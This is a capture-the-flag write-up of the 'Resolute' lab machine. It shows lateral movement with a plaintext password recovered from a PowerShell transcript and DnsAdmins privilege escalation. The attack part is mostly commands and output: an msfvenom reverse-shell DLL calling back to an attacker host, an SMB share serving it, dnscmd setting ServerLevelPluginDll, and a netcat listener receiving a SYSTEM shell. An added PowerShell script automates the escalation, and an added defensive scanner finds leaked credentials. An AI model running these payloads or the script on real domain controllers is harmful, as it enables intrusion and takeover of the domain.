PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\Users\melanie\Desktop>
- Assessment
- Found traces of a net use command in the PowerShell transcript
- This could be used for lateral movement
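- Added example (my own code, not from the original notes) covering two findings above: the password an administrator left in an LDAP `description` attribute, and the password passed to `net use` that the PowerShell transcript recorded. The scanner below runs offline over constructed samples of both formats; the "attribute: value" layout with a `dn:` line, the list of free-text attributes, and the credential patterns are assumptions about what such dumps and transcripts look like. Transcript hits are reported with the secret token redacted.

```python
"""Credential-leak scanner for LDAP dumps and PowerShell transcripts (added example).

Both samples below are constructed for this example; they imitate the
"attribute: value" layout of windapsearch/ldapsearch output and the layout of
a PowerShell transcript file, which are assumptions about those formats.
"""
import re

LDAP_SAMPLE = """\
dn: CN=Marko Novak,OU=Employees,DC=example,DC=local
cn: Marko Novak
badPasswordTime: 0
description: Account created. Password set to ChangeMe2019!
userPrincipalName: marko@example.local

dn: CN=Svc Backup,OU=Service Accounts,DC=example,DC=local
cn: Svc Backup
badPasswordTime: 132191000000000000
description: Backup service account; rotates nightly
"""

TRANSCRIPT_SAMPLE = r"""**********************
Windows PowerShell transcript start
Username: EXAMPLE\ryan
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Example-Pass-1!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
PS>net use Y: \\fs01\reports /user:ryan
PS>$sec = ConvertTo-SecureString 'Example-Pass-2!' -AsPlainText -Force
"""

# Free-text attributes where admins leave notes, and words that mark a note as
# a candidate secret. Attributes such as badPasswordTime are deliberately not
# in the list: grepping a full dump for "Password" matches them on every entry
# and buries the one real hit.
FREE_TEXT_ATTRS = ("description", "info", "comment", "title")
SECRET_HINTS = re.compile(r"\b(password|passwd|pwd|pass|secret)\b", re.IGNORECASE)
ATTR_LINE = re.compile(r"^(?P<attr>[A-Za-z][\w-]*)\s*:\s*(?P<value>.*)$")


def find_secrets_in_ldap_dump(text):
    """Return (dn, attribute, value) for free-text attributes whose value
    mentions a password. An anonymous bind reads these too, so each hit is a
    credential exposed to anything that can reach port 389."""
    findings = []
    current_dn = None
    for line in text.splitlines():
        m = ATTR_LINE.match(line)
        if not m:
            continue
        attr, value = m.group("attr"), m.group("value").strip()
        if attr.lower() == "dn":
            current_dn = value
        elif attr.lower() in FREE_TEXT_ATTRS and SECRET_HINTS.search(value):
            findings.append((current_dn, attr, value))
    return findings


# Command-line shapes that carry a credential; the "secret" group is the token
# to redact. The positional "net use" form is the one that shows up in a
# transcript when someone types the password inline.
TRANSCRIPT_PATTERNS = [
    ("net use with inline password",
     re.compile(r"\bnet\s+use\s+\S+\s+\\\\\S+(?:\s+(?!/)\S+)*\s+(?P<secret>(?!/)\S+)(?=\s|$)",
                re.IGNORECASE)),
    ("net use /user: followed by password",
     re.compile(r"\bnet\s+use\b.*?/user:\S+\s+(?P<secret>(?!/)\S+)", re.IGNORECASE)),
    ("plaintext ConvertTo-SecureString",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?(?P<secret>\S+)(?=.*-AsPlainText)",
                re.IGNORECASE)),
]


def find_secrets_in_transcript(text):
    """Return [{"line": n, "reason": ..., "text": redacted_line}] for transcript
    lines that carry a credential on the command line."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        for reason, pattern in TRANSCRIPT_PATTERNS:
            m = pattern.search(line)
            if m:
                redacted = line[:m.start("secret")] + "<redacted>" + line[m.end("secret"):]
                findings.append({"line": n, "reason": reason, "text": redacted.strip()})
                break
    return findings


if __name__ == "__main__":
    for dn, attr, value in find_secrets_in_ldap_dump(LDAP_SAMPLE):
        print(f"[ldap] {dn} {attr}: {value}")
    for f in find_secrets_in_transcript(TRANSCRIPT_SAMPLE):
        print(f"[transcript] line {f['line']} ({f['reason']}): {f['text']}")
```

Note that the transcript records the command twice (once in the `ParameterBinding` value and once in the error echo), so the same credential can appear on several lines; the scanner reports each, and the `net use ... /user:ryan` line without a password is left alone. The transcript directory itself (`C:\PSTranscripts` here) was readable by an unprivileged user, which is the second half of this finding.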
Lateral movement
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>
Information gathering on the lateral movement target
whoami
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
- Assessment
- The user is a member of DnsAdmins, so an attack using DNS looks feasible
DNS-related investigation
# Check the process
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Process -Name dns
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
5299 3689 69168 68032 844 0 dns
# Check the dnscmd command
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /Info
Query result:
Server info
server name = Resolute.megabank.local
version = 3839000A (10.0 build 14393)
DS container = cn=MicrosoftDNS,cn=System,DC=megabank,DC=local
forest name = megabank.local
domain name = megabank.local
builtin forest partition = ForestDnsZones.megabank.local
builtin domain partition = DomainDnsZones.megabank.local
read only DC = 0
last scavenge cycle = not since restart (0)
Configuration:
dwLogLevel = 00000000
dwDebugLevel = 00000000
dwRpcProtocol = 00000005
dwNameCheckFlag = 00000002
cAddressAnswerLimit = 0
dwRecursionRetry = 3
dwRecursionTimeout = 8
dwDsPollingInterval = 180
Configuration Flags:
fBootMethod = 3
fAdminConfigured = 1
fAllowUpdate = 1
fDsAvailable = 1
fAutoReverseZones = 1
fAutoCacheUpdate = 0
fSlave = 0
fNoRecursion = 0
fRoundRobin = 1
fStrictFileParsing = 0
fLooseWildcarding = 0
fBindSecondaries = 0
fWriteAuthorityNs = 0
fLocalNetPriority = 1
Aging Configuration:
ScavengingInterval = 0
DefaultAgingState = 0
DefaultRefreshInterval = 168
DefaultNoRefreshInterval = 168
ServerAddresses:
Ptr = 00000192FEBAF370
MaxCount = 1
AddrCount = 1
Addr[0] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=10.10.10.169
ListenAddresses:
NULL IP Array.
Forwarders:
NULL IP Array.
forward timeout = 3
slave = 0
Command completed successfully.
# Check the service
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents>
- Assessment
- The DNS Server service is running and the account has the DnsAdmins rights, so privilege escalation through the DNS plugin DLL looks possible
Privilege Escalation
Kali host
# On Kali, build the DLL that the DNS service will load when it starts
┌──(kali㉿kali)-[~/Resolute]
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f dll --platform windows > rev.dll
# Start an SMB server on Kali; "share" is the share name and ./ is the directory to serve
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./
[sudo] password for kali:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe60000000001
# In another terminal, start a netcat listener
```bash
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...
```
Victim host
# Register the DLL hosted on the Kali SMB server with dnscmd
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.16.4\share\rev.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
# Stop the DNS service
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
# Start the DNS service
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3184
FLAGS :
# Confirm the registry value that the service reads on start
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
ServerLevelPluginDll : \\10.10.16.4\share\rev.dll
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName : Parameters
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
# Check the DNS service state
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Service dns
Status Name DisplayName
------ ---- -----------
Running dns DNS Server
Output on success
# smbserver
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./
[sudo] password for kali:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe600000000010010006d006900520071005400740059006200030010006d00690052007100540074005900620002001000610065005a00510046004b006b00580004001000610065005a00510046004b006b0058000700080000a92a98f73dda0106000400020000000800300030000000000000000000000000400000ca9d33ca5328ab97005c3e74242716f2dbb549652b73135970b0931f6faea6a10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0034000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Closing down connection (10.10.10.169,55298)
[*] Remaining connections []
# nc
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.169] 55299
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
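The steps above (enumerate, set ServerLevelPluginDll, restart, verify) can be wrapped in one script so the preconditions are checked before anything is changed and the value can be removed afterwards. The following PowerShell is an added example and is not part of the original writeup; the script name `dns-plugin.ps1`, the default server name and the UNC path to `rev.dll` are placeholders taken from this box and must be changed for another target. The cleanup path assumes it is run from the SYSTEM shell obtained at the end, since deleting the registry value needs an elevated context.

```powershell
# Added example (not from the original writeup): DnsAdmins -> ServerLevelPluginDll
# -> service restart, with precondition checks and a cleanup path.
# Assumed placeholders: the DNS server name and the UNC path below are the values
# used in this writeup; change them per target.
param(
    [string]$DnsServer = 'resolute.megabank.local',
    [string]$PluginDll = '\\10.10.16.4\share\rev.dll',
    [switch]$Cleanup
)

$RegPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsPluginPreconditions {
    # DnsAdmins membership is what allows changing the DNS server configuration over RPC.
    $inDnsAdmins = [bool](whoami /groups | Select-String -Pattern '\\DnsAdmins\b' -Quiet)
    $svc    = Get-Service -Name DNS -ErrorAction SilentlyContinue
    $dnscmd = Get-Command dnscmd.exe -ErrorAction SilentlyContinue
    $status = if ($svc) { $svc.Status } else { 'not found' }
    # Reading the current value shows whether a plugin DLL is already configured.
    $current = (Get-ItemProperty -Path $RegPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    [pscustomobject]@{
        InDnsAdmins   = $inDnsAdmins
        ServiceFound  = [bool]$svc
        ServiceStatus = $status
        DnscmdFound   = [bool]$dnscmd
        CurrentPlugin = $current
    }
}

function Set-DnsPluginDll {
    param([string]$Server, [string]$Dll)
    # dns.exe runs as SYSTEM and calls LoadLibrary() on this path at start-up, so the
    # payload's DllMain runs before any plugin export is looked up. A UNC path makes the
    # DC's machine account (RESOLUTE$ in the smbserver output above) authenticate to the share.
    & dnscmd.exe $Server /config /serverlevelplugindll $Dll | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "dnscmd failed with exit code $LASTEXITCODE" }
    (Get-ItemProperty -Path $RegPath -Name ServerLevelPluginDll).ServerLevelPluginDll
}

function Restart-DnsServerService {
    # Stopping and starting the service is not a DnsAdmins right; it worked for ryan on
    # this box but must be checked separately on other targets. sc.exe mirrors the writeup.
    & sc.exe stop dns | Out-Null
    Start-Sleep -Seconds 3   # let STOP_PENDING finish before starting again
    & sc.exe start dns | Out-Null
    Start-Sleep -Seconds 3
    (Get-Service -Name DNS).Status
}

function Clear-DnsPluginDll {
    # Needs an elevated context (the SYSTEM shell obtained above): remove the value so the
    # service stops loading the payload, then report whether it is really gone.
    Remove-ItemProperty -Path $RegPath -Name ServerLevelPluginDll -ErrorAction Stop
    $left = (Get-ItemProperty -Path $RegPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    return [string]::IsNullOrEmpty($left)
}

if ($Cleanup) {
    if (Clear-DnsPluginDll) { Write-Output 'ServerLevelPluginDll removed' }
    Write-Output "DNS service after restart: $(Restart-DnsServerService)"
    return
}

$pre = Test-DnsPluginPreconditions
$pre | Format-List
if (-not ($pre.InDnsAdmins -and $pre.ServiceFound -and $pre.DnscmdFound)) {
    throw 'Preconditions not met; see the checks above.'
}
if ($pre.CurrentPlugin) { Write-Warning "A plugin DLL is already set: $($pre.CurrentPlugin)" }

$set = Set-DnsPluginDll -Server $DnsServer -Dll $PluginDll
Write-Output "ServerLevelPluginDll is now: $set"
Write-Output "DNS service after restart: $(Restart-DnsServerService)"
```

Run `.\dns-plugin.ps1` from the ryan session while the SMB server and the listener are up; once the SYSTEM shell is in, run `.\dns-plugin.ps1 -Cleanup` from it to delete the value and restart the service cleanly. Two caveats for a real engagement: a payload DLL that does not implement the plugin interface can leave the DNS Server service unhealthy, which on a domain controller disrupts name resolution for the whole domain, so verify and clean up promptly; and the technique leaves clear artifacts, namely the changed value under DNS\Parameters, outbound SMB from the DC authenticating as its machine account, and the service stop/start recorded in the System log (event ID 7036).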
Discussion